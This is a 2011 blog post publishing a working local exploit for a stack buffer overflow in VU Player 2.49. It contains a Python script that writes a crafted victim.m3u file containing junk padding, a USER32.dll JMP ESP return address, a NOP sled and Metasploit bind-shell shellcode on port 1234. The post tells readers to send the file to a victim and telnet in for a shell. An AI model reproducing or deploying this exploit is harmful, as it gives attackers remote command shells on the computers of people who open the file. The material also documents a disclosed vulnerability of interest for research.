Wednesday, September 28, 2011

VU Player stack buffer overflow Local Exploit

This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.

I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category:: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
#List bad characters \x00  \x09   \x0a  \x1a
#Generated form Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writinng payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22